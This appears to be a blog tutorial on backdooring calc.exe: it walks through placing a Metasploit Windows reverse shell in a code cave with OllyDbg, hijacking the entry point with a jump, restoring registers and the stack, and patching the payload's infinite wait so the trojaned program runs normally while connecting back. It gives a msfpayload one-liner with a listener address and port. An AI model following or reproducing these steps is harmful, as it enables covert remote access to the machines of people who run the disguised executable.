Hi there, today we are going to inject a windows cmd reverse shell from metasploit inside a simple windows executable. We’ll place our backdoor inside calc.exe.
I will explain exactly what I did here, you can do the thinkin’ and extract the “generic process” of backdooring a exe from this example.
We start by opening calc.exe with some debugger like ollydbg, then we start the process.
First of all we have to locate some empty space inside the file, we’ll insert our evil payload there
Then we select the starting address of our evil payload and we take note of it. The first thing we have to do inside our evil payload, is to save the registers at that point of the execution, we will restore it later allowing calc.exe to run normally. We can save the values of the registers and flags inside the stack with pushad and pushfd
Next thing to do is to generate our evil payload with metasploit (hex) this cool oneliner can do the job
msfpayload windows/shell_reverse_tcp LHOST=192.168.11.3 LPORT=443 R | hexdump -v -e ‘”\\””x” 1/1 “%02x” “”‘ | sed ‘s/[\”x;]//g’
And then paste all the code in our code cave, just after pusad and pushfd
Now we browse to the entry point of the program, we copy the first instructions and we replace the first one with a JMP to our payload
Don’t forget to take notes about every step
Now we start testing how our code is working, we have to take note about what is ESP pointing to just after pushing the registers and the flags into the stack and what does it point to after our payload is executed
We make the difference between these 2 ESP addresses and we insert an instruction like ADD ESP,DIFFERENCE this will restore the ESP register to our desired value
After doing that, we place the first instructions that have been overwrited with our JMP at the end of the payload, and finally we insert a JMP to the next instruction to be executed normally. Now we save all those changes and we run calc.exe
meanwhile on msfconsole…
The infected program runs just after the shell is closed on metasploit, thats because a parameter on a payload’s function is set to -1 (infinity) (https://msdn.microsoft.com/es-es/library/windows/desktop/ms687032%28v=vs.85%29.aspx)
We can solve that by finding DEC ESI, PUSH ESI, INC ESI on the payload
And replacing DEC ESI and PUSH ESI with NOP’S
Now the program will run like nothing is happening and a really nice shell will appear on the metasploit handler
The cool stuff will began in the next chapter P-)